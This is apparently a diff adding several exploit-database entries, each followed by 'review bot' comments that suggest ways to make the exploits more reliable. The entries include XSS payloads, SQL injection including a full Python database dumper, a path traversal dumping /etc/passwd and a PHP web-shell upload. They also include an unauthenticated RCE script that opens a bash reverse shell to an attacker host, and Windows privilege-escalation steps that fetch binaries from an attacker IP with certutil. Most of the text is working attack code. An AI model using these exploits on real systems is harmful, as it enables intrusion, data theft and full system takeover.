text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Origin: http://127.0.0.1
Referer: http://127.0.0.1/bangresto/admin/menu.php
Cookie: PHPSESSID=2vjsfgt0koh0qdiq5n6d17utn6
Connection: close
itemName=test&itemPrice=1&menuID=1&addItem=
3. Then use any XSS Payload in "itemName" parameter and click add.
4. You will see XSS pop up.
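Review bot: step 3 says to "use any XSS Payload in "itemName" parameter" but the hunk never shows a payload or where the stored value is rendered, so the reproduction is incomplete; add one concrete request (for example `itemName=<script>alert(document.domain)</script>&itemPrice=1&menuID=1&addItem=`) and name the page(s) where the menu item is displayed, because the impact depends on whether staff or customer-facing pages render it. The steps require an authenticated admin ("First login to your admin panel"), so the summary should state that privilege level and who the victim is. The captured request's `Content-Length: 87` does not match the short body shown.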


@ -0,0 +1,43 @@
# Exploit Title: Bang Resto v1.0 - 'Multiple' SQL Injection
# Date: 2023-04-02
# Exploit Author: Rahad Chowdhury
# Vendor Homepage:
https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
# Software Link:
https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip
# Version: 1.0
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-29849
*Affected Parameters:*
btnMenuItemID, itemID, itemPrice, menuID, staffID, itemPrice, itemID[],
itemqty[], btnMenuItemID
*Steps to Reproduce:*
1. First login your staff panel.
2. then go to "order" menu and Select menu then create order and intercept
request data using burp suite.
so your request data will be:
POST /bangresto/staff/displayitem.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 194
Origin: http://127.0.0.1
Referer: http://127.0.0.1/bangresto/staff/order.php
Cookie: PHPSESSID=2rqvjgkoog89i6g7dn7evdkmk5
Connection: close
btnMenuItemID=1&qty=1
3. "btnMenuItemID" parameter is vulnerable. Let's try to inject union based
SQL Injection use this query ".1 union select
1,2,3,CONCAT_WS(0x203a20,0x557365723a3a3a3a20,USER(),0x3c62723e,0x44617461626173653a3a3a3a3a20,DATABASE(),0x3c62723e,0x56657273696f6e3a3a3a3a20,VERSION())--
-" in "btnMenuItemID" parameter.
4. Check browser you will see user, database and version informations.
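Review bot: the "Affected Parameters" list repeats `btnMenuItemID`, `itemID` and `itemPrice`, and only one of the listed parameters (`btnMenuItemID` in `staff/displayitem.php`) is demonstrated, although the title says "Multiple" and names like `staffID`, `itemID[]` and `itemqty[]` clearly belong to other forms; either show one request per affected endpoint or reduce the claim to what is reproduced. The UNION payload in step 3 is quoted as `.1 union select 1,2,3,CONCAT_WS(...)-- -`; the leading `.` looks like a stray character, and the payload should be given URL-encoded as it is actually sent, since spaces and the `-- -` comment matter in a form body. The `Content-Length: 194` header does not match the `btnMenuItemID=1&qty=1` body.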


@ -0,0 +1,76 @@
# Exploit Title: GDidees CMS 3.9.1 - Local File Disclosure
# Date : 03/27/2023
# Exploit Author : Hadi Mene
# Vendor Homepage : https://www.gdidees.eu/
# Software Link : https://www.gdidees.eu/cms-1-0.html
# Version : 3.9.1 and earlier
# Tested on : Debian 11
# CVE : CVE-2023-27179
### Summary:
GDidees CMS v3.9.1 and lower versions was discovered to contain a local file disclosure vulnerability via the filename parameter at /_admin/imgdownload.php.
### Description :
Imgdownload.php is mainly used by the QR code generation module to download an QR code.
The vulnerability occurs in line 4 where the filename parameter which will be opened later is not filtered or sanitized.
Furthermore, there is no admin session check in this code as it should since only the admin user should normally
be able to download QR code.
Vulnerable Code :
3. if (isset($_GET["filename"])) {
4. $filename=$_GET["filename"];
.....
.....
27. @readfile($filename) OR die();
### POC :
URL : https://[GDIDEESROOT]/_admin/imgdownload.php?filename=../../../../../../etc/passwd
Exploitation using curl
# curl http://192.168.0.32/cmsgdidees3.9.1-mysqli/_admin/imgdownload.php?filename=../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
ntp:x:104:110::/nonexistent:/usr/sbin/nologin
messagebus:x:105:111::/nonexistent:/usr/sbin/nologin
uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
pulse:x:107:115:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false
hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
vboxadd:x:998:1::/var/run/vboxadd:/bin/false
openldap:x:109:118:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:120:MySQL Server,,,:/nonexistent:/bin/false
### References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27179
https://nvd.nist.gov/vuln/detail/CVE-2023-27179
https://www.exploit-db.com/papers/12883
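Review bot: the title "Local File Disclosure" undersells what the description establishes: `_admin/imgdownload.php` passes `$_GET["filename"]` straight to `readfile()` with no traversal check and, per the description, no admin session check, so this is an unauthenticated arbitrary file read via path traversal, and the title and summary should say so. The POC dumps the whole `/etc/passwd` of the test VM, including the local user and VirtualBox accounts; the first two or three lines are enough evidence. Minor: the POC URL uses six `../` and the curl example five; either works from `/_admin/`, but pick one. Among the references, the two CVE entries are clearly relevant, while `https://www.exploit-db.com/papers/12883` is worth confirming as the intended link.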

exploits/php/webapps/51383.py Executable file

@ -0,0 +1,164 @@
#!/usr/bin/python3
#######################################################
# #
# Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection #
# Date: 2023/04/13 #
# ExploitAuthor: msd0pe #
# Project: https://github.com/waqaskanju/Chitor-CMS #
# My Github: https://github.com/msd0pe-1 #
# Patched the 2023/04/16: 69d3442 commit #
# #
#######################################################
__description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'
__author__ = 'msd0pe'
__version__ = '1.1'
__date__ = '2023/04/13'
class bcolors:
PURPLE = '\033[95m'
BLUE = '\033[94m'
GREEN = '\033[92m'
OCRA = '\033[93m'
RED = '\033[91m'
CYAN = '\033[96m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class infos:
INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "
ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "
GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "
PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "
import re
import requests
import optparse
from prettytable import PrettyTable
def DumpTable(url, database, table):
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
x = PrettyTable()
columns = []
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
columns.append(i)
pass
except:
pass
x.field_names = columns
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
i = i.split("xzmdpl")
x.add_rows([i])
except ValueError:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
i = i.split("xzmdpl")
i.append("")
x.add_rows([i])
print(x)
def ListTables(url, database):
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
x = PrettyTable()
x.field_names = ["TABLES"]
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
x.add_row([i])
except:
pass
print(x)
def ListDatabases(url):
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
x = PrettyTable()
x.field_names = ["DATABASES"]
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
x.add_row([i])
except:
pass
print(x)
def Main():
Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)
Menu.add_option('-u', '--url', type="str", dest="url", help='target url')
Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')
Menu.add_option('-D', '--db', type="str", dest="database", help='select a database')
Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables')
Menu.add_option('-T', '--table', type="str", dest="table", help='select a table')
Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content')
(options, args) = Menu.parse_args()
Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
""")
Menu.add_option_group(Examples)
if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:
Menu.print_help()
print('')
print(' %s' % __description__)
print(' Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)
print(' Any malicious or illegal activity may be punishable by law')
print(' Use at your own risk')
elif len(args) == 0:
try:
if options.url != None:
if options.l_databases != None:
ListDatabases(options.url)
if options.database != None:
if options.l_tables != None:
ListTables(options.url, options.database)
if options.table != None:
if options.dump != None:
DumpTable(options.url, options.database, options.table)
except:
print("Unexpected error")
if __name__ == '__main__':
try:
Main()
except KeyboardInterrupt:
print()
print(infos.PROCESS + "Exiting...")
print()
exit(1)
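Review bot: the bare `except: pass` around the column extraction in DumpTable (just after the first `u = requests.get(url + payload, headers=header)`) means that when the injection fails or the `qpzkq[...]qjkbq` markers are absent, `columns` stays empty and the second query is built as `CONCAT_WS(0x787a6d64706c, )`, so the script prints an empty PrettyTable instead of an error; check that `r` is non-empty before indexing `r[0]` and return with `infos.ERROR` when no marker is found. The `except ValueError` branch below it re-parses the whole response and appends an empty cell to every row, which corrupts rows that already had the right number of fields; pad only the row that raised. Two smaller points: `__description__` says `< 1.1.2` while the title and the `Patched the 2023/04/16: 69d3442 commit` line say v1.1.2 itself is affected, so `<= 1.1.2` is meant; and `Menu.add_option_group(Examples)` runs after `parse_args()`, so the examples never appear in `-h` output, only in the fallback `print_help()` path.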


@ -0,0 +1,43 @@
Exploit Title: Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)
Application: Piwigo
Version: 13.6.0
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://piwigo.org/
Software Link: https://piwigo.org/get-piwigo
Date of found: 18.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1.After uploading the image, we write <img%20src=x%20onerror=alert(4)> instead of the tag(keyword) while editing the image)
payload: <img%20src=x%20onerror=alert(4)>
POST /piwigo/admin.php?page=photo-9 HTTP/1.1
Host: localhost
Content-Length: 159
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/piwigo/admin.php?page=photo-9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: pwg_id=u7tjlue5o3vj7fbgb0ikodmb9m; phavsz=1394x860x1; pwg_display_thumbnail=display_thumbnail_classic; pwg_tags_per_page=100; phpbb3_ay432_k=; phpbb3_ay432_u=2; phpbb3_ay432_sid=9240ca5fb9f93c8ebc8ff7bd42c380fe
Connection: close
name=Untitled&author=&date_creation=&associate%5B%5D=1&tags%5B%5D=<img%20src=x%20onerror=alert(3)>&description=&level=0&pwg_token=bad904d2c7ec866bfba391bfc130ddd2&submit=Save+settings
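Review bot: the payload in the steps (`alert(4)`) does not match the captured request body, where `tags%5B%5D=<img%20src=x%20onerror=alert(3)>`; use one value so the PoC reproduces verbatim, and show the decoded stored value `<img src=x onerror=alert(3)>`, since the `%20` form is only the URL encoding of the POST body. The request goes to `admin.php?page=photo-9` with a `pwg_id` session cookie and a valid `pwg_token`, so this is an authenticated stored XSS that needs an account allowed to edit photos in the administration area; state that privilege level, and name the page on which the stored tag is rendered unescaped (the PoC only shows the write, not the read), because that determines who is affected when the tag is viewed.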


@ -0,0 +1,89 @@
Exploit Title: ProjeQtOr Project Management System 10.3.2 -Remote Code Execution (RCE)
Application: ProjeQtOr Project Management System
Version: 10.3.2
Bugs: Remote Code Execution (RCE) (Authenticated) via file upload
Technology: PHP
Vendor URL: https://www.projeqtor.org
Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.3.2.zip/download
Date of found: 19.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
Possible including php file with phar extension while uploading image. Rce is triggered when we visit again
Payload:<?php echo system("id"); ?>
poc request:
POST /projeqtor/tool/saveAttachment.php?csrfToken= HTTP/1.1
Host: localhost
Content-Length: 1177
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY0bpJaQzcvQberWR
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/projeqtor/view/main.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: currency=USD; PHPSESSID=2mmnca4p7m93q1nmbg6alskiic
Connection: close
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentFiles[]"; filename="miri.phar"
Content-Type: application/octet-stream
<?php echo system("id"); ?>
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentId"
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentRefType"
User
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentRefId"
1
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentType"
file
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10485760
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentLink"
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentDescription"
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentPrivacy"
1
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="uploadType"
html5
------WebKitFormBoundaryY0bpJaQzcvQberWR--
visit: http://localhost/projeqtor/files/attach/attachment_5/miri.phar
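Review bot: `Bugs:` says `(Authenticated)` and the request carries a `PHPSESSID` cookie, but the title line lacks `(Authenticated)`; align the two. The upload is posted to `saveAttachment.php?csrfToken=` with an empty token and is still accepted, which is either a second finding (CSRF on attachment upload) or needs a sentence explaining why the token may be empty. Execution of `miri.phar` as PHP also depends on the web server handing `.phar` to the PHP handler (the Debian/Ubuntu packaged Apache+PHP configuration does, by its `FilesMatch` on `.ph(ar|p|tml)`, but this is not universal), so list that as a precondition and say which extensions the upload filter rejects. Finally, `attachment_5` in the visit URL comes from the JSON response to the upload, which is not shown; include it so a reader knows where the ID comes from.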


@ -0,0 +1,45 @@
# Exploit Title: FUXA V.1.1.13-1186- Unauthenticated Remote Code Execution (RCE)
# Date: 18/04/2023
# Exploit Author: Rodolfo Mariano
# Vendor Homepage: https://github.com/frangoteam/FUXA
# Version: FUXA V.1.1.13-1186 (current)
from argparse import RawTextHelpFormatter
import argparse, sys, threading, requests
def main(rhost, rport, lhost, lport):
url = "http://"+rhost+":"+rport+"/api/runscript"
payload = {
"headers":
{
"normalizedNames":{},
"lazyUpdate": "null"
},
"params":{
"script":{
"parameters":[
{
"name":"ok",
"type":"tagid",
"value":""
}
],
"mode":"",
"id":"",
"test":"true",
"name":"ok",
"outputId":"",
"code":"require('child_process').exec('/bin/bash -c \"/bin/sh -i >& /dev/tcp/%s/%s 0>&1\"')" % (lhost,lport)
}
}
}
response = requests.post(url, json=payload)
args = None
parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, usage="python exploit.py --rhosts <ip> --rport <rport>--lport <port>")
parser.add_argument('--rhost', dest='rhost', action='store', type=str, help='insert an rhost')
parser.add_argument('--rport', dest='rport', action='store', type=str, help='insert an rport', default=1881)
parser.add_argument('--lhost', dest='lhost', action='store', type=str, help='insert an lhost')
parser.add_argument('--lport', dest='lport', action='store', type=str, help='insert an lport')
args=parser.parse_args()
main(args.rhost, args.rport, args.lhost, args.lport)
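Review bot: `--rport` defaults to the integer `1881`, but `main()` builds the URL with `"http://"+rhost+":"+rport`, so running without `--rport` raises `TypeError: can only concatenate str (not "int") to str` (argparse only parses string defaults); use `default="1881"`, or `type=int` with an f-string. `response` is assigned and never inspected, so the operator gets no indication whether `/api/runscript` accepted the request; print `response.status_code` and the body. The usage string says `--rhosts` while the option is `--rhost`; `--lhost` and `--lport` are not `required=True`, so a missing value puts `None` into the `code` string; and `sys` and `threading` are imported but unused. The bash reverse shell also needs a listener (`nc -lvnp <lport>`) that the script neither starts nor mentions.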


@ -0,0 +1,38 @@
# Exploit Title: File Replication Pro 7.5.0 - Privilege Escalation/Password reset due Incorrect Access Control
# Date: 2023-04-13
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: http://www.diasoft.net - https://www.filereplicationpro.com
# Software Link: http://www.filereplicationpro.com/install/InstData/Windows_64_Bit/VM/frpro.exe
# Version: 7.5.0
# Tested on: Windows 10 Pro 22H2 x64
# CVE: CVE-2023-26918
Incorrect file/folder permissions in Diasoft Corporation's File Replication Pro 7.5.0 allow privilege escalation by
replacing a file with another one that will be executed with "LocalSystem" rights from Windows Services application.
C:\Program Files>icacls "c:\Program Files\FileReplicationPro"
c:\Program Files\FileReplicationPro Everyone:(F)
Everyone:(OI)(CI)(IO)(F)
C:\Users\Administrator>sc qc frp
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: frp
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : "C:\Program Files\FileReplicationPro\prunsrv.exe" //RS//frp
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : FRPReplicationServer
DIPENDENZE : Tcpip
: Afd
SERVICE_START_NAME : LocalSystem
To exploit the vulnerability a malicious actor/process must weaponize or replace the prunsrv.exe executable that runs
with LocalSystem privileges as "frp" (FRPReplicationServer) service, since the application's path has "Everyone" full
access permissions.
Moreover, the "properties.xml" file in the "etc" folder inside program's path contains the hashed password for remote
access stored in sha1(base64) value, that is possible to modify. Replacing it with a new hash, generated by encrypting
a string in SHA-1 and encoding its digest via base64, will grant the login access on the application's web interface.
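Review bot: the last paragraph describes the stored value first as `sha1(base64)` and then as base64 of a SHA-1 digest; those are different orders, and SHA-1 is a hash rather than an encryption, so state it once as base64(sha1(password)) and name the element in `etc\properties.xml` that holds it so a reader can verify. The binary-replacement path is only shown up to the `Everyone:(F)` ACL and the `LocalSystem` service configuration; since a standard user normally cannot restart `frp`, add the trigger (reboot, or `sc sdshow frp`/accesschk output showing who may start the service) so the escalation chain is complete. The `icacls` output is also for the folder only; include the same check on `prunsrv.exe` itself, since that is the file being replaced.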


@ -0,0 +1,372 @@
####################################################################################################################
# Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation #
# Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] #
# Date: 13/04/2023 #
# Exploit Author: Zer0FauLT [admindeepsec@proton.me] #
# Vendor Homepage: https://www.aspemail.com #
# Software Link: https://www.aspemail.com/download.html #
# Product: AspEmail #
# Version: AspEmail 5.6.0.2 and all #
# Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU #
# Tested on: Windows Server 2016 and Windows Server 2019 #
# CVE : 0DAY #
####################################################################################################################
# ==================================================================================================================
[+] C:\PenTest>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
# ==================================================================================================================
* First, we will test whether the AspEmail service is active.
* First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running:
[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe
EmailAgent.exe 4400 Persits Software EmailAgent
or
[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe
EmailAgent64.exe 4400 Persits Software EmailAgent
* We have detected that the process of the "Persits Software Email Agent" Service is state "RUNNING".
* Now we know that AspEmail service is active.
# ==================================================================================================================
* We will need these:
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"
# ==================================================================================================================
[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
Name: Persits Software EmailAgent
ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email
Agent.exe" /run
User : LocalSystem
ModifiablePath : C:\Program Files (x86)\Persits Software\AspEmail\BIN
IdentityReference : Everyone
Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory,
AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile,
ReadExtendedAttributes, DeleteChild, Execute/Traverse
Status : Unknown
UserCanStart : False
UserCanStop : False
[+] C:\PenTest>del PrivescCheck.ps1
* We detected "Persits Software EmailAgent" Service "Binary Permission Vulnerability" in our checks.
# ================================================================================================================== #
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.
* We do not have permission to access subdirectories.
# ==================================================================================================================
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
DeepSecLab\psacln:(I)(OI)(CI)(N)
DeepSecLab\psaadm:(I)(OI)(CI)(N)
DeepSecLab\psaadm_users:(I)(OI)(CI)(N)
BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
NT SERVICE\TrustedInstaller:(I)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)
* Unlike other directories, we have full privileges in the "BIN" directory of the service.
* This is chmod 0777 - rwxrwxrwx in linux language.
# ==================================================================================================================
[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"
root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16
[EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators
* We understood "EmailAgent.exe" processor was installed by the Administrator and the owner is the Administrator user.
# ==================================================================================================================
* Now we will take ownership of this directory as we will execute our operations under the "BIN" directory.
[+] C:\PenTest>whoami
DeepSecLab\Hacker
[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F
processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN
Successfully processed 1 files; Failed processing 0 files
* Ok. All commands resulted successfully. We now have full privileges for this directory.
# ==================================================================================================================
* Now we will modify the EmailAgent file and inject a self-written malware.
* We will be careful not to damage any files while doing this so that all transactions can be easily undone.
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe
